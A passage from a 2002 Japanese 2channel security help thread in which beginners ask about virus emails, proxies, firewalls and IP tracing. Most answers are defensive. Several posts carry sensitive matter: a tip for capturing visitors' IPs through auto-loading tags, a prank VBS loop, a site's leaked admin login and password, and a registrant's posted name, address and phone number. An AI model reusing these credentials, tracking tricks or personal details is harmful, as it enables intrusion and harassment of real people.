教えてちゃんですみません。 とあるサイトの掲示板に、利用者が、荒らしに対してキレたらしく、 「裏でIP調べてアドレスをネット上に公開しますよ? 」 と言う書き込みをしていたのですが、これって、簡単に出来ることなんでしょうか? 本人は、「そういう仕事をしていたし、やるのは簡単」 「やる時はアシ付かないように出来るし、ヘマなんかしない。」と、 やけに意気込んでいるのですが・・・。 これって、合法的なんでしょうか? ちなみにその人はそこの管理人でもない、只その掲示板で遊んでる一利用者なのですが・・・。
553 :
名無しさん@お腹いっぱい。 :02/03/15 05:54
公開PROXY規制中ってでることあるんですけど、 どういう事なんでしょう?
>>552 IP自体、そうそう固定IP持ってるブルジョアはいまいw
いろいろIP取る法はあるが
自分のアクセスログの取れるサイトなり鯖にアクセスさせることだ
タグの使えるBBSやチャットで自分の鯖なり(他人のものでも)アクセスさせていまえばよいのだよ
URL指定して自動で読み込むタグはいろいろあるでしょ
まっプロバイダが口割らければ 個人まではいかんべ
>>553 プロクシ=串には誰でも使えるものがある(公開)
それで来ると串のIPで認識される(匿名串なら)
串の設置者が口割らないと元が分からない(犯罪でもないかぎりログを見せる義務はない)
ただし、最初から串であるかは判別はできる
それをシャットアウトしているのだ
ちなみに自Web鯖があるように 串もお手軽に立てられる
他人に使わせてログを取り 弱みを握るやからもいるようだから
(大抵 ロクな目的で使ってないだろ オマエラ)
安易に公開串は使わないこと(・∀・)
>>552 簡単に出来るかどうかは知らんがIP晒してもそれほどダメージは無いと思われ。
実際IP表示する掲示板なんていくらでもあるし。
「そういう仕事をしていたし」ってのはワラタ。
個人的には、本当に出来る奴は宣言なんかしないと思う。
>>551 やられたな(・∀・)
IEかい?w
★ActiveXは安全だろうがなんだろうが無効!
★Javaも無効!
君のPCにはすでにプログラムが侵入して
IEのレジストリの書き換えを無効にされているのだ
IEならMSサイトにあるセキュリティパッチは全て入れておけ
それでもMSサイトに出てるのは遅いがな
☆スクリプトも無効が望ましいが、警告表示で必要なときだけ許す
こういうのはウイルスチェックでひっかかるかは疑問だな
おそらくWindowsにとっては正規のソフトと変わらんだろしなw
まあ入れられる前にチェックプログラム(ノートン先生とかw)
動かしてればわかったんだろうけどな
まあ IE削除(再インスト)→だめならHDDフォーマットしちまえ、OS再インストだ
それでもだみならプログラム詳しいやつしかダミだな(ここまでなら逆にすごいがなw)
それもオベンキョ〜(・∀・)
558 :
名無しさん@お腹いっぱい。 :02/03/15 07:14
ノートン先生とか入れても設定が分からなかったり、 セキュリティー警告でパニック起こす人(かつての俺)多いからなぁ。 みんなもっと勉強しませう。
559 :
名無しさん@お腹いっぱい。 :02/03/15 08:03
(・∀・)ウンコが北
>>557 ところどころ言ってることがムチャクチャなんだが。
>IEのレジストリの書き換えを無効にされているのだ
↑おそらく全然違う。
"レジストリを書き直す"ことによって元に戻るんだと思ふ。
「すでにレジストリの書き換えが無効」だなんて紛らわしいことは言わないで欲しい。
>>551 おかしいと思ったら直ぐにウィルススキャン
復旧作業はそれから。
マズはアプリの追加削除からIEを選択して"IEの修復"を試してみれ。
それでもダメなら、
MS-DOSモードで起動→"scanreg /restore"でレジストリを復元。
それでもダメならIE再インスト。
これでもまだダメな場合は最後の手段でC:\フォーマットしてOS再インスト。
>>556 99%の確率で「IP抜く」はカマかけてるんだと思ふ。
実際できるヤツはできるけど。
でもその人がそういう事をできるかどうかの判断は実は他人には判別できない。その為の情報がない。
(ちなみに、IPアドレスを晒す事は違法でもなんでもない)
で、話を戻して…、そう言われて荒らしがビビルかどうかを観察するのがその人の目的だったんだと思ふ(=ハッタリ)
しかし「IP抜くぞ」っていう平易な表現に騙されてはダメだと思ふんだよな。
スキルのあるヤツがアフォにも分かりやすい表現でわざとそう言ったのだと思えなくもない。
実際、管理者とかだったら簡単にできるだろうし。
そんな荒れる掲示板には行きたくないのが本音。
561 :
名無しさん@お腹いっぱい。 :02/03/15 08:42
掲示板で利用者が、IPを抜く方法を教えてください あれこれ、7時間くらい 検索して 探したのですが全く見つかりません 別に、IPを抜いて悪いことをするのではなく 知的向上として知りたいのです。 もし、ここで言うのがマズイのであれば 何という言葉で、検索すれば出てくるのかを 教えてください お願いします。
562 :
名無しさん@お腹いっぱい。 :02/03/15 09:03
564 :
名無しさん@お腹いっぱい。 :02/03/15 10:58
Outlook Expressでメールを読むを選ぶと勝手にメールを 開いてしまうので、件名を見てから開くどうか判断したい時は どうすれいいですか。
>>554 レスありがとうございます。パソコン歴半年位の勉強不足の者です。
私は公開串というものをなぜか使ってるということですか?
567 :
名無しさん@お腹いっぱい。 :02/03/15 13:08
Win2k再インストールした。 ウィルス対策とファイアーウォール。 入れるならどれ?
569 :
助けてください :02/03/15 13:17
メールが一日に100通ほど来るウイルスに感染してしまいました。 今からウイルスバスターを入れたら直りますか? くだらない質問ですいません。
>>569 ウイルスバスターが対応してるウイルスなら、直ると思います。
>>564 どっかでも聞いてなかったか?まあ、セキュリティと無関係じゃな
いので書いておくよ。
OEの「表示」→「レイアウト」→「プレビューウィンドウを表示する」
のチェックを外す
見た瞬間に数百種類のウイルスに感染し、ブラクラで映像はグロという最強のURL知ってますか?
573 :
名無しさん@お腹いっぱい。 :02/03/15 15:27
今日の朝刊に日本語ウィルスの件載ってたけど、 ヤパーリ「うんこ」とは書いてなかった。
ありがとう。 聞くの初めてです。
575 :
名無しさん@お腹いっぱい。 :02/03/15 16:56
>575 dat落ちしました。 今、IEで確認。 レス数985、最終書込が 02/03/15 15:51 そんな板orスレッドないです。 隊長! スレッド 1010428470.dat は、html化されるのを待っているようです。 しばらく待つしかない。
577 :
教えてちゃん :02/03/15 18:20
今日ヘンなメールが来ました。これがウイルスかどうかわからないのです。 色々なウイルス情報見たんですけどわかりませんでした。 件名:do you enjoy 添付ファイル interested.bat とParticiant Application.doc の二つ。 来たのは海外から。ヘッダにto:無し。 そして本文が何故かCan you and will you use a Japanese style toilet for 2 weeks? yes no とトイレ関係で始まる(笑) アンケート形式のナンバリングされた質問が7〜9まで。1から6は無し(笑) これもやっぱりウイルスでしょうか?
>>576 板TOP3位にある状態でdat落ちは初めて見たyo! 題名なし1なしカ
キコできずだったんでどうしたのかと。
580 :
cheshire-cat :02/03/16 00:52
なんだか今、リフレッシュタグ貼られたような感じで、リロード後に4回ほどまた初めから読み込みさせられるんだけど。 何なんだ?
治った。漏れだけか、験が悪いな。
PCがウイルスに感染したかどうか簡単にわかる方法おしえて。
Tripwire
>>580-581 鯖監のページを取得してそのタブを閉じないでいると
そんな感じになるようです
585 :
名無しさん@お腹いっぱい。 :02/03/16 01:56
たった今プロバのメアドにウイルス届いたYO! 件名:資料 本文:なし 添付:patch.exe 送信元がODNだったけど見知らぬ人なので晒しちゃおうかな。(´¬`)
586 :
名無しさん@お腹いっぱい。 :02/03/16 02:05
当りの名前じゃなかったな。 残念。
>>582 アンチウイルスソフトで感染チェックする。
588 :
名無しさん@お腹いっぱい。 :02/03/16 02:56
>>585 オデンのどっかのサイトがはくられたみたいですね…
しかも、ネットショップ関係ダト思う。
そのサイトでしかさらしていないメアドから、ウイルスメールが毎日届くようになったもん。
大手じゃないけど、結構な数の出店があったと思うから、
そこの持ってるメアドはながれちゃったんだろうな、と推測。
こういう場合、そこに知らせてあげるべきだよね?
珈琲豆屋さんから、ウイルスメールが届くご時世かい…。
589 :
名無しさん@お腹いっぱい。 :02/03/16 08:07
あるディレクトリが丸見えのサイトがあります。 この中にcgiファイルがあるのですが、ダウンロードしてもhtml表示部しか見ることが出来ません。 このソースを見るにはどうしたらよいでしょうか?
>>590 気持ち悪いことやってないで、サイト管理人に聞け。
ウイルスに犯されたようでHDDが初期化されてしまいました〜 それで万一の時のバックアップ用に外付けのHDDを買おうと考えているのですがSCSIとUSBのどちらがいいでしょうか? USBの方が大容量でいい感じですが、ネット接続時に電源落とせたでしょうか?
>>591 >>592 早速のご回答有り難うございます。
サイト管理人に聞いた結果、無視でした。
祈ってみましたが、祈り方が悪いのか無理でした。
他に方法はありませんか?
教えてください。
祈りながら待ってます。
600 :
名無しさん@お腹いっぱい。 :02/03/16 17:45
†(-.-) さぁ、祈りなさい
祈り疲れました。
602 :
名無しさん@お腹いっぱい。 :02/03/16 21:36
>>602 IP厨のたわごとだから気にするな。
モグラの串焼きという5年くらい前に流行った手法。当時はISPのセキュリティが
甘かったからIPアドレス抜かれると電番まで抜かれた。今はそんなところは無い。
>>603 レスありがとうございます。
なんか、個人情報が抜かれているのは確実だという
声が多いのですが・・・。
パスワード、メアド、名前などがばれてしまっているらしく、
「アドレス帳に登録されているメアドに悪戯メールが送られる
かもしれない」との声も・・・。
本当なのでしょうか?
>602 の踏んじゃった・・・ telnetいぱーい立ち上がったよー それだけかと思ったら、接続しようとしたよー
>>607 telnet.exe(でしたっけ?)削除していないの?
>>608 telnet.exeの削除方法を教えてください。
ファイルを探してデリートでOKでしょうか?
telnetサービスは無効にしてあります。
OS:Windows XP Pro
>>608 最近はハイパーターミナル
ふつーレジストリのtelnet,rlogin,tn3270は削除
611 :
不正登録? :02/03/17 01:38
実家の大阪にXPとウィルスバスター2002を 買って送ってやったのですが、どうやら自分がインストールする前に 「友達に貸してしまった」らしいのです。その友達は 「誰でも何度でも使える」と豪語したそうですが、あとで 自分がインストールするときに不正コピーになると思い、 すぐに返してもらえといってあります。 ここで皆さんの意見を聞きたいのです。やはりすぐに返してもらうべき なのか、それとも、じつは不具合なく使いまわせる ということがあるのか。私自身、パソコン初心者なので はっきりした意見がいえないのです。よろしくお願いします。
612 :
名無しさん@お腹いっぱい。 :02/03/17 01:43
degawa.cgi
>>611 その貸してやったヤシはただの厨房なのか、それとも少なくとも
アングラ系サイトを巡回できるレベルなのかどっちだ?
後者ならクラックの方法ぐらい知っていると思うので安心せい。
クラックして何度でも使いまわせる様にした糞Pはシリアル難波も
別なので問題ない。性器の物はちゃんと登録できるはず。
厨房なら直ぐ返してもらえ。
質問です。信じて貰えないかもしれませんが 以前2ちゃんねるの書き込みから私のプロバイダのメールアドレスが 割れたことがあるんです。 ちょっと調子に乗った書き込みしてたらあかの他人から 「君、こんな事2ちゃんに書いちゃダメだよ〜?」っとやんわり お叱りのメールが届きまして。 それ以来怖くなってネット上で調子こかないようにしてるのですがw 「○○スレッドの××番目の書き込みは君でしょ〜?」 と相手には分かっていたので、2ちゃんの書き込みからメルアドが割れた のは間違いないと思います。(もちろん2ちゃんにメルアドは載せてないです 2ちゃんねるはIPを保存してない事で有名ですが こんな事って可能なのでしょうか? 重ね重ね信じて貰えないかもしれませんが、マジっす。
ちなみにその時はIPが割れるようなトラップに ひっかかったワケでもないっす。
>>615 そのお叱りのメール、晒しageキボーンヌ
ってネタはやめれっつーの。
少し前の話で、そのメールが届いた後 怖くなってHDを消したのでメールは残っていません。 「どうして分かったのか?」と言う旨の返信をしたのですが 返事は来ませんでした。 ちなみに届いたメールの件名は 「八苦八区ハックしちゃいました♪」って言う感じの ちょっとふざけた感じっぽかったですw どーいう追跡の仕方をしたらバレるんでしょうかね???
>>615 あかの他人のフリをした同級生だったり、同僚だったり、家族だったり、FW管理者だったり…
>>619 確かにその可能性は捨てきれないですね。
心当たりはないのですが、怖いのでそう思う事にしますw
続けて質問で申し訳ないのですが2ちゃんねるが
「書き込み元は絶対にバレない。なぜならIPを保存してないからだ!」
って言うのはどういう仕組みなのでしょうか?
書き込み内容は反映されているので微小なりとも「アクセスログ」的な
モノが残っている(残ってしまう)のが普通ではないのかなー?
と思ってしまうのですが。
ちなみに自分はウイルススキャンソフトやPFWを入れるだけ程度の知識しか
なく、セキュやハックに関してはかなり素人です。
専門用語満載でも構いませんのでどなたかご説明していただければ
ありがたく思います。
>>615 会社からの書き込みだったらネット管理者説が濃厚。
普通は通信記録をチェックしてるでしょ。
いたずらよりも寧ろ注意喚起。
あと、
アクセスログの保存はするかしないか管理者次第だと思うんだけど。
ひろゆきはチェックはしてないし保存はしてないみたいなこと言ってたような…
素人なんでよくわかんないけど「リアルタイムで」2ちゃんのサバからIP抜いてさらにそのIPを管理してるところをハクる。
こんなことでもしないと2ちゃんから個人情報抜くのは無理だと思うんだけど。
↑自分で言うのもなんだが「だけど星人」みたいになっちまった(w
623 :
名無しさん@お腹いっぱい。 :02/03/17 09:00
>>615 素人なんで良くわからないけど、
2chの書き込みから追跡されたんじゃなくて、
もともとPCごとハクられてたと考える方が簡単じゃないの?
624 :
名無しさん@お腹いっぱい。 :02/03/17 09:29
そういやネット始めたばっかりの頃(4年前ぐらい)、 確かICQだったと思うけど、 初対面のアメリカ人の少年とチャットしてて、 「あなたは黒人?白人?」って聞こうとして、 途中までタイプして、 やっぱりその質問はやめておこうと思って、 BackSpaceで消したんだけど、 消し終わろうとした瞬間に、 「僕は白人だよ」って言われてびっくりした。 送信せずに消したし、 送信されてない証拠にチャット画面にも出てなくて。 気持ち悪くなってすぐチャットやめたんだけど、 これって画面覗かれてたのかな?
625 :
名無しさん@お腹いっぱい。 :02/03/17 11:33
Norton Personal Firewall なんですけど 変なとこアクセス変更したのか こんなのログが残るのですが・・・どこを修正すればよいのやら とんと??です ちなみに1分に3回ほどログが残ります 日付: 2002/03/17 時刻: 11:26:16 規則「SSDP Service on Windows Millennium」が fmv-biblo-i1,1900 をブロックしました。詳細: インバウンド UDP パケット ローカルアドレス、 サービスは fmv-biblo-i1,1900 リモートアドレス、 サービスは fmv-biblo-i1,1028 プロセス名は C:\WINDOWS\SYSTEM\SSDPSRV.EXE ご教授くださいませ
628 :
名無しさん@お腹いっぱい。 :02/03/17 18:09
>>626 逝ってきました、怖いこと書いてあり速攻インストールしたけど
変わりなしです
で、最近マイクロソフトでアップデートしたときMSメッセンジャー入れてたんで
削除したらなんとなく治まったみたいな。。。関係ないかぁハァ〜
2chIDをIPに変換できるやつ あれ何処行ったの?
むかつく奴のIPを手に入れました。 どうすれば奴を絞めることができますか?
>631 そういう質問は初級ネットでやってくれ。
>>631 相手がIP再取得してたら全然違う他人に迷惑をかけることになるが。
634 :
名無しさん@お腹いっぱい。 :02/03/17 22:32
>>2-3 に書いてある物のほかに、
何か「これぞっ!」というようなログ解析ツールはありますか?
ちょっと昼間は用事があったのでレス書けませんでした、スマセン。
>>621 書き込みは自宅のPC・契約プロバイダからの接続で行っていました。
>>623 当時他の板、他のHPでも煽り・暴言・暴露話を書いていたのですが(w
お叱りを受けた対象の書き込みをするまで注意を促すメール等は
来た事が有りませんでしたので、もともとハクされていた可能性は
少ないかな?と思っています。
>>621 さんが言われたように
「2ちゃんのサバからIP抜いてさらにそのIPを管理してるところをハクる。」
が行われたのかな〜?
でもそれって物凄い手間とスキルが必要ですよねぇ。うーん。
マルチになってしまいますが、初級ネット板でも聞いて見ます。
皆さん、ありがとうございました。
636 :
名無しさん@お腹いっぱい。 :02/03/17 23:38
マカフィーのスレってどこいっちゃった?
>>636 スレ立ちませんでした。
よって、終了。
>637 やっぱりそうですか・・・
ソルトレイクシティで行われたオリンピックで スピードスケートでラッキーで優勝したオーストラリアの選手の名前はなんだったでしょうか? 1位でゴールしたにもかかわらず、失格になった韓国の選手の名前はなんだったでしょうか?
>>624 昔のICQのchat機能って一文字ずつ表示されたね。
641 :
名無しさん@お腹いっぱい。 :02/03/18 06:53
642 :
名無しさん@お腹いっぱい。 :02/03/18 13:51
パソコン起動時にAVGが自動で起動しないように設定するにはどうするんですか?
643 :
名無しさん@お腹いっぱい。 :02/03/18 14:29
タイトルが「次回飲み会の地図」、本文が「次回飲み会の地図を 送付しマース。」で、jpg画像付きのウイルスってあります? ちなみに画像はチンコでした。
644 :
ウイルス? :02/03/18 18:51
送信者 cytex (←知らない人) タイトル A special nice game 本文 This is a nice game This game is my first work. You're the first player. I expect you would like it. 添付ファイル picacu.exe(85.3KB) このpicacu.exeは実行しても大丈夫ですか?
645 :
オール反珍 :02/03/18 18:54
拡張子を変えて ・・ソースにならないか・・・・・
>>644 ピカチューEXEかい(w
まあ、9割方ウイルスだろうな
思いっきり怪しいだろう。 実行して良いかなんて、そんなこと人に聞いてる時点でナンセンスだと思うよ。
その後 とりあえず添付ファイルを適当なフォルダに保存してみた。 そしたらその直後DOS画面になってAVGが警告を出した。 「Klez.E」というウイルスみたい。AVGが発病を止めてくれた。 レジストリ等を念のためチェックし無事を確認。 このウイルスって6日になるとファイルを0に置き換えちゃうのね。 結果 大丈夫じゃなかった(自己解決)
電波キタ ─wwヘ√レvv〜(゚∀゚)─wwヘ√レvv〜─ !!!
651 :
名無しさん@お腹いっぱい。 :02/03/18 21:05
すみません。ここで聞いてもよいかわかりませんが質問です。 下のような書き込みを見たのですが、これを実行すると どうなるのでしょうか? >まず、適当なテキストファイルを作れ。メモ帳で十分だ。 で、以下の文字をコピペしろ。 Dim i For i=1 to 65535 MsgBox "(^∀^)シネヨ!" Next これでオッケーだ。次に文書を 〜.vbs と命名して保存する。 最後に保存した文書をダブルクリックしてみろ。
>>652 変なメッセージボックスが表示されるだけ。
やめとけ。
>>652 やってみりゃわかる
つーかfor文見てみろよ プログラムのプの字もしらんのか?(プ
ネタでしょ
>>651 そうなんですよ、お前ら、助けて下さい
もう脳まで・・・
ぞぬアーマー軍団に参加するぞぬ
657 :
名無しさん@お腹いっぱい。 :02/03/18 21:52
658 :
名無しさん@お腹いっぱい。 :02/03/18 23:05
こいつ、コーゲキしてくるんだ。 だれか、助けて。 203.181.96.161 gsr-ote2.kddnet.ad.jp 203.181.96.82 tr-ote3.kddnet.ad.jp 210.120.192.1 ysng12bb1-ge3-0.tr.bora.net 210.120.248.131 ysnbbb71-ge4-0-0.rt.bora.net
>>658 それぞれのIPアドレスが近いんだけど。
Port80叩かれているのか?
660 :
七誌見習い :02/03/18 23:23
一度読んだら消えるメールが書けるツールを探してます。 昔はよく見かけたんですが最近ぜんぜんみかけなくなっちゃって・・・ なにかヒントをいただけたらと思います。 よろしくおねがいしますm(__)m
662 :
七誌見習い :02/03/18 23:32
>>661 くだらない質問にレスありがとうございます。
携帯電話に送れるとかってありますか??
そっちも是非お願いしますm(__)m
663 :
名無しさん@お腹いっぱい。 :02/03/18 23:33
ハッカーの皆さん。ハッキングの方法の乗っているサイトをおしえてちょ。
マカフィースレ立てていいですか?
>>662 >携帯電話に送れるとかってありますか
携帯で受信するメールに送信できる、の意味?
666 :
◆oXbs48Fk :02/03/18 23:42
一定時間毎に「モコ」って音が鳴るウィルスありますか? 最近なりはじめたんですけど・・・ 幻聴じゃないよ(w
668 :
名無しさん@お腹いっぱい。 :02/03/19 00:06
携帯電話にエロスパムすると言う事は、未成年者の利用もあることから考えれば
犯罪と考えられます?
DOCOMOなので、ソースが無いんですけど、
メールの内容から、kanjiru.netっつうのがあって
index.htmlがないから、チャット、入り放題(笑
逝っても、つまらんけど…CGIはそのまま落とせるし、セキュリティー甘い
で、こいつは
Kojiro Sato
Minaminaka
Yokohama-shi, Kanagawa 231-0006
JP
Domain Name: KANJIRU.NET
Administrative Contact:
Kojiro Sato
[email protected] Kojiro Sato
Minaminaka
Yokohama-shi, Kanagawa 231-0006
JP
Phone- 045-651-6860
らしいよ、登録した奴だけどね…
で、IPサーチで、更に見てみると
株式会社ラット (RAT Co.,Ltd.)
NETPLATZ [210.172.232.0 <-> 210.172.232.127] 210.172.232.0/25
三菱電機情報ネットワーク株式会社 (MITSUBISHI ELECTRIC INFORMATION NETWORK CORPORATION)
SUBA-052-232 [サブアロケーション] 210.172.232.0
だってさ…三菱???
>>669 ネタなのかな?
って感じがするんだけど、
実際逝ってきた…
イロイロ楽しい感じ
671 :
ちょいと質問 :02/03/19 00:46
市販されてるセキュリティソフトで 圧縮されたトロイを発見できるものが あれば教えていただきたいんですが・・・
674 :
名無しさん@お腹いっぱい。 :02/03/19 12:44
すいません、ここで聞いて良いか判りませんが…。 IE6とXPの環境です。 ネットサーフィン中、とりあえずリンクをクリックしてサイト移動しようとすると、何故か特定のサイトへ強制的にリンクします。 (特に、とあるカジノサイト) 具体例を挙げると、YAHOOからXと言うサイトを検索し、飛ぼうとするとXではなくカジノ系サイトへ飛んでしまいます。 エロサイト大好きなのでヤバイ所にも行ったと思います。 何かPCに寄生してるのかな?と思いウイルスバスターかけても何の反応もありません。 ディスクトップや他の場所に見慣れないアイコンがあると言った事もないです。 一体なんなんでしょう??
誰もわからないですか・・・。 こんなウイルス聞いたこともないので、とりあえず送り主のプロバイダーに 連絡はしたんだけど・・・。
676 :
名無しさん@お腹いっぱい。 :02/03/19 13:28
フォルダにパスかけれるフリーのソフトないですか?
678 :
名無しさん@お腹いっぱい。 :02/03/19 20:43
netstat -aで、 Local AddressもForeign Address自分のところでLISTENINGって言うのは こいつは、何を企んでいやがりますか?
>678 もっとちゃんとした日本語書いてくれ。 で、開いてるポートは何?
>>679 TCPって書いてあるところ全部・・・・例えば1025とか5000とか。
TCPって接続先がない状態だと、自分のところの0.0.0.0を表示すものなんですか?
682 :
名無しさん@お腹いっぱい。 :02/03/21 03:06
ttp://www.zdnet.co.jp/news/0203/20/ccdlegal.html いまこのサイトに行ったら右上に
今日のニュース
2002年3月21日 connect 'ssh -l broom.zdnet.co.jp:20023' wait 'login:' sendln 'zdadmin' wait 'Password:' sendln 'zdadm!n' sendln 'zdupdate news/past/past.txt' sendln 'logout' end
って出たんですが、これってなんでしょう?
683 :
名無しさん@お腹いっぱい。 :02/03/21 13:19
>>682 あーっ 書いちゃった。 自首すると罪が軽減されるよ。
684 :
名無しさん@お腹いっぱい。 :02/03/21 13:37
別板行ってると リモートホストがやたらとアクセスしようとするんですけど。
685 :
名無しさん@お腹いっぱい。 :02/03/21 13:54
インターネットにjoeアカおくな!! >zdnet
686 :
名無しさん@お腹いっぱい。 :02/03/21 15:40
私のパソコンなんですが、ドライブでダブルクリックするとバックアップがでてくるんです。 ファイルとかは正常にうごくんですが・・・ ウイルスにやられたのでしょうか? あと、それよりだいぶ前からモニターの上がゆがんでるんです。 波を打ってるような感じです。これってウイルスなんでしょうか?
>686 >私のパソコンなんですが、ドライブでダブルクリックするとバックアップが >でてくるんです。 もぅ全く意味不明だ! 何のOSで?漠然とバックアップ?ってなに? >波を打ってるような感じです。これってウイルスなんでしょうか? 違います。ピンがはずれかけか、ほこり溜まってんじゃない。 掃除してみれば直るよきっと
ありがとうございますOSはWINDOWS98です。 バックアップは、マイクロソフトバックアップがたちあがります。 マイコンピュータのドライブをダブルクリックするとたちあがってきます。 また、スキャンディスク、デフラグをすると、CDROMなのでできませんと表示されます。
>>686 なにやらかしてそうなったのかわからんがとりあえず上書きインストール
した方が良いのでは。
ケーブルでグローバルIPもらえる事になったのですが、トロイとか色々 何をどう気をつければいいのでしょうか? やはりルーター等を入れなければいけないのでしょうか? NETは最初がケーブルなので、セキュリティに関してもルーター等に関しても知識が無いので・・・
普通に使うんならファイアウオールソフトを入れるだけ でいいと思う。
693 :
名無しさん@お腹いっぱい。 :02/03/21 17:40
テスト
ありがとうございます。 アイコンの変更をしようとすると、hddにアプリケーションとしてマイクロソフトバックアップ がでてくるようになってしまってるのです。 上書きインストール以外でなにか直す方法ありませんか?
セキュリティ診断するページで自分のWindows情報を見たら RemoteAddressというのだけ表示されてしまいました。 これってなんなんでしょう? そして見えなくさせるにはどうすればいいんでしょうか?
ping -tもDos攻撃の一種ですか?
700 :
名無しさん@お腹いっぱい。 :02/03/22 12:52
すごい初心者なんですが、よろしいでしょうか? 知人や、知人の知人のメールアドレスから、 「Happy Lady Day」とか、似たような件名のメールがくるんです。 html文書と、拡張子がexeやbatのファイルがついています。 そのhtml文書はまた別の知人のwebページの一部だったりもします。 そして私からも、知人に同じようなメールを送信しているらしいのです。 PCの動作も重くなり、困っています。 これってウイルスですよね? 検索しても出てきません、、、 良かったら対策を教えてください! ガイシュツだったらすみません。
701 :
名無しさん@お腹いっぱい。 :02/03/22 13:35
702 :
名無しさん@お腹いっぱい。 :02/03/22 13:43
すみません、デスクトップ右下に変な広告がでるのですが これはどうすれば出ないようにできるのでしょうか?
703 :
名無しさん@お腹いっぱい。 :02/03/22 14:02
この板の人っていつもすごい数の攻撃を受けてるみたいだけど、 それってパソコンに詳しくなると活動範囲が広がるから 目をつけられやすくなって攻撃されてるんですか? それともボクら初心者は攻撃されていること自体に気づいてなくて 実はこの板の人以上に攻撃を受けているだけですか?
>>703 後者。そう、気付いてないだけです。ただダイヤルアップだと頻繁にIP
変わるし、接続時間が短いので標的にはされにくいけどね。
>>702 終了させれば?
>>703 レス=攻撃とでも思っているの?
いくら初心者でも自分の環境ぐらい書けるでしょ?
あいまいな質問にはあいまいな回答しか返ってこないよ
706 :
名無しさん@お腹いっぱい。 :02/03/22 14:12
小規模なオフィスにおいて、ルーターでパケットフィルタリングした上で、別途にファイヤーウォールを導入する意味ってあるんですか?
>>704 ありがとうございます。
>>705 すいません。レス=攻撃というのがよく分かりませんが、一般論が聞きたかったんです。
708 :
名無しさん@お腹いっぱい。 :02/03/22 14:25
>>701 わざわざありがとうございます!
今からさっそく対処法の通りにしてみます。
709 :
名無しさん@お腹いっぱい。 :02/03/22 14:39
インターネットの料金が分かる場所って何処ですか? 携帯の通信料みるところみたいなOCNでISDNです
>>705 > レス=攻撃とでも思っているの?
そうじゃなくて(w、実際のハッキング攻撃のことを言ってるんじゃないの?
712 :
名無しさん@お腹いっぱい。 :02/03/22 15:18
取ってもスマソ>710
713 :
名無しさん@お腹いっぱい。 :02/03/22 15:25
>>703 この板に書き込まれる件数と日本全国でネットに繋げられる人の数を考えれば
少ないだろ?
攻撃=ポートスキャンじゃないのは解るよな
実際にバックドアから侵入されたとか置きみやげ置かれたとかそんなに出てないだろ
#別の攻撃なのか?
#ウイルスも攻撃で良いのか?
714 :
春なんだから質問スレはage進行で :02/03/22 16:39
>>713 ホワイトハウスの件は攻撃とは言わないのか。そうか。
>>716 一つ賢くなったサソクソ。でも、まだその線引きがよく分からん。
出来れば一つご鞭撻願いたいが、どうか?
激しく既出だとは思うのですが見つけられないので。User Agent他のHTTP Requestをそぎ落としたいのですがどうすればよいでしょう? あとproxyについても教えていただければ幸いです。
>>719 UserAgentを変えたいのならタブブラウザでも使えば?
Proxyについて何を知りたいの?
721 :
名無しさん@お腹いっぱい。 :02/03/23 01:55
>>720 ,
>>721 さん
ありがとうございます。当方、主にIEエンジンのタブブラウザを使っております。結局MSIEで出てしまいます。
一応プロシキも二段ほど通しているのですがRequestはもろにでていたようなので…
とりあえずリンクで勉強してきます。とりあえずありがとうございました。
>>722 タブブラウザを使っているだけで設定を全く変えてない
ってことはないよな?
>>723 どこの設定のことでしょう?プロキシは変更(といいますか内部プロシキ使っているのでIE依存で変更)していますが?
User-Agentはどうすれば?レジストリは書き直されるし…
>>723 変更したいのはUser-Agentだろ? プロキシは関係なし
Use-Agentを変えられないタブブラウザ使ってるんじゃないの?
727 :
名無しさん@お腹いっぱい。 :02/03/23 12:22
Temporary Internet Files\ContentIE5フォルダの中にある 数字アルファベット計8文字のファイルを ウィルスの疑いがあるとアンチドートが警告しました。 しかしTemporary Internet Filesフォルダを開けて 全てのファイルを表示にしてもIE5以下のフォルダは見つかりませんでした。 フォルダ内のファイルを全て削除してもIE5以下のフォルダは 存在しています。どこを探せばいいでしょうか。 ちなみにNAVとVBオンラインスキャンではウィルスは発見されませんでした。
728 :
名無しさん@お腹いっぱい。 :02/03/23 14:32
既出かとおもうのですが質問させてください。 KLEZ.Eウィルスに感染したPCから削除できないファイルがあります。 ウィンドウズ使用中のシステムファイルということなので MS−DOSよりDELコマンドで削除しようとしましたが消せませんでした。 原因は何でしょう? 対処法がありましたらお教えくださいm(__)m
729 :
名無しさん@お腹いっぱい。 :02/03/23 14:50
質問ですが・・ADSLでルーターを使用しているんですけど・・・ この間までポート21番と80番が開いていたままネットにつないで いたんですが・・・(今は全部ステルスですが)ノートンのFWと組み 合わせていたんですけど(FWだけだとポートは全てステルスです) これってグローバルIPはポートが開いているけど、プライベートIPの ポートはステルスだってことでいいんですか?
>>725 たぶんそうだと思います。(表の)設定には見当たりません。変更できるツールにはどのようなものがありますか?検索だとヒット数が多すぎて(もしくは該当無し)絞り込めません。教えていただければ幸いです。
Windows NT 5.1です。
IPアドレスのフィルターの範囲指定の仕方教えて下さい 具体的に 218.14.*.* から 218.62.*.* までしたい。
732 :
名無しさん@お腹いっぱい。 :02/03/23 17:48
マカフィーはダメ スレのpart3が見つからないけど 誰か知りませんか? 無い?
>>731 218.14.0.0-218.62.255.255
734 :
何でCE機で見れないんですか? :02/03/23 19:10
IPフィルタでかくんですよね!! そういう書き方できないです マスがあって 1あどれすつ書くのが限界
>>728 駆除ツール使えば、とか言ってみる。
>>729 過去・現在の状況が混じっていて、文意が読み取れないんだが。
NAT変換してると、ダイレクトにこちら側の個々のプライベートIPアドレスに(基本的には)接続できないので、さほど問題無いような気が。
もちろんルーターの内側がグローバルIPアドレスだったら、やばいけど(企業やお役所ではあるんだよね、そゆの)。
でもやっぱり、ルーターのフィルタリングすればいいのに、と言ってみる。
>>735 範囲指定とかサブネットマスクで指定できないのか?
VBS_TIMOFONICA みたいな 携帯を壊す ウイルスって他にあるんですか? 502の機種をとめる(金縛り?)みたいなのもありましたが。 今現実的に簡単に携帯をおかしくする方法おしえてください。
水に浸ける
失礼しました。幾つか検索回ってきましたが要求を満たしたものが見つけられたと思います。ありがとうございました。
IPフィルタリングでポートを全部閉じてネットをやるには 53と80だけ開けばよいのですか?
いえ、ネットをするには全部開けなければなりません 25と110も開けて下さい
こんばんわ、質問させて頂きます。 ハッカー(或いはクラッカー)は個人のパソコンにハッキングする事ができるのでしょうか? 自分で調べたところサーバーにしかハッキングできないと思うのですが・・・ どうなんでしょうか? 厨な質問ですみません。どなたかご教授お願いします。
